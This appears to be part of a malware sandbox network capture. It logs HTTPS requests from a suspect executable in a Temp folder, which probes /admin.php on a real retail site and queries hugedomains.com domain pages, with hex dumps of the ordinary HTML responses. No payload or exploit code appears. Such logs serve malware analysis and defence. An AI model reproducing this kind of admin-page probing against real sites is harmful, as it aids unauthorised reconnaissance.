2023-12-22 20:15:09 UTC	741	IN	Data Raw: 6f 70 3a 30 70 78 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 20 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 68 6f 70 70 69 6e 67 43 61 72 74 4c 69 6e 6b 49 44 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 68 6f 70 70 69 6e 67 20 43 61 72 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 73 68 6f 77 22 3e 53 68 6f 70 70 69 6e 67 20 63 61 72 74 3c 2f 73 70 61 6e 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 68 64 76 33 2d 69 6d 67 2f 63 61 72 74 2e 70 6e Data Ascii: op:0px;"><a href="https://www.HugeDomains.com/shopping_cart.cfm" class="whiteLink " id="hdv3HeaderShoppingCartLinkID" aria-label="Shopping Cart"><span class="mobile-show">Shopping cart</span><img src="https://static.HugeDomains.com/images/hdv3-img/cart.pn
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 37 66 66 61 0d 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 3f 64 3d 56 69 78 65 6a 26 65 3d 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 6d 2d 62 2d 30 20 6d 2d 74 2d 30 20 22 20 69 64 3d 22 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 22 20 6f 6e 43 6c 69 63 6b 3d 22 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 20 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 50 72 6f 63 65 49 44 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 20 6c Data Ascii: 7ffa<a href="https://www.HugeDomains.com/shopping_cart.cfm?d=Vixej&e=com" class="btn m-b-0 m-t-0 " id="hdv3Billboard197BuyID" onClick="$('#hdv3Billboard197BuyID').addClass('hiddenAtLoad'); $('#hdv3Billboard197BuyProceID').removeClass('hiddenAtLoad'); l
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 2d 62 74 6e 20 70 61 79 6d 65 6e 74 70 61 79 2d 61 63 63 61 75 6e 74 2d 63 6f 6e 74 65 6e 74 2d 62 74 6e 20 62 74 6e 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 37 33 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 22 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 Data Ascii: -btn paymentpay-accaunt-content-btn btn hiddenAtLoad" onclick="return false;" style="height:50px; margin-left:0px; min-width:273px; margin-top:0px; margin-bottom:25px; display:flex;">Processing<div class="circularJ"><div class="circularJ_1"></div><div
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 64 3d 22 70 6f 73 74 22 20 69 64 3d 22 6c 61 6e 64 65 72 46 6f 72 6d 43 35 46 32 36 36 33 44 42 43 32 35 34 30 37 38 38 32 41 32 34 34 31 35 44 41 36 30 34 45 44 32 49 44 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 63 61 72 74 43 68 65 63 6b 22 20 76 61 6c 75 65 3d 22 30 22 20 69 64 3d 22 6c 61 6e 64 65 72 46 6f 72 6d 43 35 46 32 36 36 33 44 42 43 32 35 34 30 37 38 38 32 41 32 34 34 31 35 44 41 36 30 34 45 44 32 43 68 65 63 6b 49 44 22 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 61 6e 64 65 72 46 75 6e 63 43 35 46 32 36 36 33 44 42 43 32 35 34 30 37 38 38 32 41 32 34 34 31 35 44 41 36 30 34 45 44 32 46 75 6e 63 28 29 20 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 67 65 74 Data Ascii: d="post" id="landerFormC5F2663DBC25407882A24415DA604ED2ID"><input type="hidden" name="cartCheck" value="0" id="landerFormC5F2663DBC25407882A24415DA604ED2CheckID"></form><script>function landerFuncC5F2663DBC25407882A24415DA604ED2Func() {document.get
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 20 6e 6f 77 3c 2f 61 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 76 61 6c 75 65 20 69 64 3d 22 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 54 61 62 50 72 6f 63 65 49 44 22 20 63 6c 61 73 73 3d 22 20 70 6c 61 63 65 2d 6f 72 64 65 72 2d 62 74 6e 20 70 61 79 6d 65 6e 74 70 61 79 2d 61 63 63 61 75 6e 74 2d 63 6f 6e 74 65 6e 74 2d 62 74 6e 20 62 74 6e 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 31 37 30 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 Data Ascii: now</a><button type="button" value id="hdv3Billboard197BuyTabProceID" class=" place-order-btn paymentpay-accaunt-content-btn btn hiddenAtLoad" onclick="return false;" style="height:50px; margin-left:0px; min-width:170px; margin-top:10px; margin-bottom:2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
280	192.168.2.4	54187	104.24.82.4	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:09 UTC	173	OUT	GET /admin.php HTTP/1.1 Host: thenile.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	623	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 22 Dec 2023 20:15:09 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close location: https://www.thenile.com.au/admin.php via: 1.1 google CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FlhKfUjasa1zC8g0OwkUNpbwkg9ghc%2FdyrkO6yNn4WgobusY2zB2UXafqRaW2y6nXn5PHTWW0MSeRNTlXo9SpPzWHtVDpdrR2nv%2FhSgc01fddHy4pWbCnb7tWqCId2vw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b0904dce49add-MIA
2023-12-22 20:15:09 UTC	249	IN	Data Raw: 66 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 68 65 6e 69 6c 65 2e 63 6f 6d 2e 61 75 2f 61 64 6d 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: f3<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.thenile.com.au/admin.php">here</a>.</p></body></html>
2023-12-22 20:15:09 UTC	6	IN	Data Raw: 31 0d 0a 0a 0d 0a Data Ascii: 1
2023-12-22 20:15:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
281	192.168.2.4	54192	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:09 UTC	203	OUT	GET /domain_profile.cfm?d=yuejichem.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	800	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:15:09 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:15:09 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wk9E06A27ldQfknH42iJV8Xe5bI%2B4y2iuorVvWI5PizUo%2BGMYgYrjfR9wqrvYefYc4omZ0nNnWfE6H8G4rG6uaQ5%2BGj3Tyf1dH%2FGWi0T26NkQ%2FY6Chz4yWs5nsH2fIMYvSC3gGs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b0904ff49747d-MIA
2023-12-22 20:15:09 UTC	569	IN	Data Raw: 39 33 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 73 63 72 69 70 74 20 69 64 3d 22 63 6f 6f 6b 69 65 79 65 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2d 63 6f 6f 6b 69 65 79 65 73 2e 63 6f 6d 2f 63 6c 69 65 6e 74 5f 64 61 74 61 2f 65 37 31 62 63 35 33 66 31 63 62 38 38 36 36 36 64 31 36 30 63 31 65 32 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 Data Ascii: 935<!DOCTYPE html><html lang="en"><head><script id="cookieyes" type="text/javascript" src="https://cdn-cookieyes.com/client_data/e71bc53f1cb88666d160c1e2/script.js"></script><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><met
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 72 65 62 6f 6f 74 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 63 73 73 2f 68 64 76 33 2d 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 3f 61 61 3d 32 30 32 31 2d 30 36 2d 30 39 61 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f Data Ascii: " /><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/reboot.min.css"><link rel="stylesheet" href="https://static.HugeDomains.com/css/hdv3-css/style.css?aa=2021-06-09a"><link rel="stylesheet" href="https://static.HugeDomains.com/
2023-12-22 20:15:09 UTC	426	IN	Data Raw: 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 7a 79 77 36 6d 64 73 2e 63 73 73 22 3e 0a 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 37 31 31 37 33 33 39 2d 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0d Data Ascii: href="https://use.typekit.net/zyw6mds.css"><script async src="https://www.googletagmanager.com/gtag/js?id=UA-7117339-4"></script><script>window.dataLayer = window.dataLayer \|\| [];function gtag(){dataLayer.push(arguments);}gtag('js', new Date());
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 31 31 32 61 0d 0a 3a 20 27 48 44 76 33 27 20 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 68 72 65 66 3d 22 23 6d 61 69 6e 22 20 63 6c 61 73 73 3d 22 73 6b 69 70 2d 6d 61 69 6e 22 3e 53 6b 69 70 20 74 6f 20 6d 61 69 6e 20 63 6f 6e 74 65 6e 74 3c 2f 61 3e 0a 3c 68 65 61 64 65 72 20 69 64 3d 22 68 65 61 64 65 72 22 20 63 6c 61 73 73 3d 22 68 64 76 33 48 65 61 64 65 72 44 61 72 6b 42 6c 75 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 73 2d 6f 76 65 72 6c 61 79 2d 6d 6f 64 61 6c 20 6f 76 65 72 6c 61 79 2d 6d 6f 64 61 6c 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 2d 74 6f 70 20 64 2d 66 6c Data Ascii: 112a: 'HDv3' });</script></head><body><a href="#main" class="skip-main">Skip to main content</a><header id="header" class="hdv3HeaderDarkBlue"><div class="js-overlay-modal overlay-modal"></div><div class="container "><div class="header-top d-fl
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 6e 43 6c 69 63 6b 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 53 75 62 6d 69 74 46 75 6e 63 28 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 20 22 20 73 74 79 6c 65 3d 22 6d 69 6e 2d 77 69 64 74 68 3a 39 30 70 78 3b 20 68 65 69 67 68 74 3a 33 35 70 78 3b 22 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 42 75 74 74 6f 6e 49 44 22 3e 53 65 61 72 63 68 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 76 61 6c 75 65 20 69 64 3d 22 68 64 76 33 48 65 61 64 65 72 53 65 61 72 63 68 50 72 6f 63 65 73 73 69 6e 67 49 44 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 2d 62 74 6e 20 62 74 6e 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 20 77 69 64 74 68 35 30 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 74 Data Ascii: nClick="hdv3HeaderSearchSubmitFunc(); return false; " style="min-width:90px; height:35px;" id="hdv3HeaderSearchButtonID">Search</button><button type="button" value id="hdv3HeaderSearchProcessingID" class="search-btn btn hiddenAtLoad width50" onclick="ret
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 66 61 71 2e 63 66 6d 22 3e 46 41 51 73 3c 2f 62 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 61 62 6f 75 74 2e 63 66 6d 22 3e 41 62 6f 75 74 20 75 73 3c 2f 62 3e 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 22 Data Ascii: class="nav-item"><a class="nav-link " href="https://www.HugeDomains.com/faq.cfm">FAQs</b></a></li><li class="nav-item"><a class="nav-link " href="https://www.HugeDomains.com/about.cfm">About us</b></a></li><li class="nav-item"><a class="nav-link "
2023-12-22 20:15:09 UTC	295	IN	Data Raw: 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 64 65 2d 77 72 61 70 70 20 64 6e 2d 6d 6f 62 69 6c 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6c 69 64 65 2d 73 69 64 65 62 61 72 2d 62 6c 6f 63 6b 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 69 6e 6e 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 69 6e 6e 65 72 2d 6e 65 77 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 73 2d 62 6c 6f 63 6b 2d 74 69 74 6c 65 20 67 72 65 65 6e 22 3e 59 75 65 6a 69 43 68 65 6d 2e 63 6f 6d 3c 2f 73 70 61 6e 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 6f 77 2d 73 61 76 65 20 73 73 2d 62 6e 20 22 3e 0a 3c 73 70 61 6e 3e 42 75 79 20 6e 6f 77 3a 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 Data Ascii: "><div class="side-wrapp dn-mobile"><div class="slide-sidebar-block"><div class="ss-block-inner"><div class="ss-block-inner-new"><span class="ss-block-title green">YuejiChem.com</span><span class="row-save ss-bn "><span>Buy now:</span><span class="
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 32 38 33 64 0d 0a 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 48 75 67 65 44 6f 6d 61 69 6e 73 2e 63 6f 6d 2f 73 68 6f 70 70 69 6e 67 5f 63 61 72 74 2e 63 66 6d 3f 64 3d 59 75 65 6a 69 43 68 65 6d 26 65 3d 63 6f 6d 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 6d 2d 62 2d 30 20 6d 2d 74 2d 30 20 22 20 69 64 3d 22 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 22 20 6f 6e 43 6c 69 63 6b 3d 22 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 49 44 27 29 2e 61 64 64 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 29 3b 20 24 28 27 23 68 64 76 33 42 69 6c 6c 62 6f 61 72 64 31 39 37 42 75 79 50 72 6f 63 65 49 44 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 68 69 64 64 65 6e 41 74 4c 6f 61 64 27 Data Ascii: 283d<a href="https://www.HugeDomains.com/shopping_cart.cfm?d=YuejiChem&e=com" class="btn m-b-0 m-t-0 " id="hdv3Billboard197BuyID" onClick="$('#hdv3Billboard197BuyID').addClass('hiddenAtLoad'); $('#hdv3Billboard197BuyProceID').removeClass('hiddenAtLoad'
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 63 65 2d 6f 72 64 65 72 2d 62 74 6e 20 70 61 79 6d 65 6e 74 70 61 79 2d 61 63 63 61 75 6e 74 2d 63 6f 6e 74 65 6e 74 2d 62 74 6e 20 62 74 6e 20 68 69 64 64 65 6e 41 74 4c 6f 61 64 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 35 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 20 6d 69 6e 2d 77 69 64 74 68 3a 32 37 33 70 78 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 35 70 78 3b 20 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 22 3e 50 72 6f 63 65 73 73 69 6e 67 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 69 72 63 75 6c 61 72 4a 5f 31 22 3e 3c 2f 64 69 Data Ascii: ce-order-btn paymentpay-accaunt-content-btn btn hiddenAtLoad" onclick="return false;" style="height:50px; margin-left:0px; min-width:273px; margin-top:0px; margin-bottom:25px; display:flex;">Processing<div class="circularJ"><div class="circularJ_1"></di
2023-12-22 20:15:09 UTC	1369	IN	Data Raw: 69 43 68 65 6d 2e 63 6f 6d 22 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 20 69 64 3d 22 6c 61 6e 64 65 72 46 6f 72 6d 44 33 36 35 37 30 42 45 43 39 45 32 34 30 34 31 38 36 31 37 41 30 30 36 42 34 34 34 41 32 44 32 49 44 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 63 61 72 74 43 68 65 63 6b 22 20 76 61 6c 75 65 3d 22 30 22 20 69 64 3d 22 6c 61 6e 64 65 72 46 6f 72 6d 44 33 36 35 37 30 42 45 43 39 45 32 34 30 34 31 38 36 31 37 41 30 30 36 42 34 34 34 41 32 44 32 43 68 65 63 6b 49 44 22 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0d 0a 66 75 6e 63 74 69 6f 6e 20 6c 61 6e 64 65 72 46 75 6e 63 44 33 36 35 37 30 42 45 43 39 45 32 34 30 34 31 38 36 31 37 41 30 30 36 42 34 34 34 41 32 44 32 46 75 6e 63 28 29 Data Ascii: iChem.com" method="post" id="landerFormD36570BEC9E240418617A006B444A2D2ID"><input type="hidden" name="cartCheck" value="0" id="landerFormD36570BEC9E240418617A006B444A2D2CheckID"></form><script>function landerFuncD36570BEC9E240418617A006B444A2D2Func()

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
282	192.168.2.4	54191	104.26.6.37	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:09 UTC	207	OUT	GET /domain_profile.cfm?d=keywordranker.com HTTP/1.1 Host: www.hugedomains.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:09 UTC	869	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close cache-control: private vary: Accept-Encoding set-cookie: site_version_phase=108; expires=Mon, 16-Dec-2024 20:15:09 GMT; path=/ set-cookie: site_version=HDv3; expires=Mon, 16-Dec-2024 20:15:09 GMT; path=/ set-cookie: captcha-tracker=; expires=Thu, 21-Dec-2023 20:15:09 GMT; path=/ x-powered-by: ASP.NET lb: TclPrdLbHd3 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CQBUOx3lLFz8Wi5tWc5eAbrPRVxXNjk32ObLmr3tHNSjmlJ2qHMZrmr3RndyXLdibBMX0hNO3AfZiN8VZ5V6JwXwVnrqDnzNTUzsgL%2Bg57cPGoz3ulaWRvDOzmhEgwbHPdUN0AU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b09050a194c02-MIA
2023-12-22 20:15:09 UTC	500	IN	Data Raw: 31 61 65 66 0d 0a 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 66 61 6e 63 79 61 70 70 73 2f 66 61 6e 63 79 62 6f 78 40 33 2e 35 2e 37 2f 64 69 73 74 2f 6a 71 75 65 72 79 2e 66 Data Ascii: 1aef<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.f
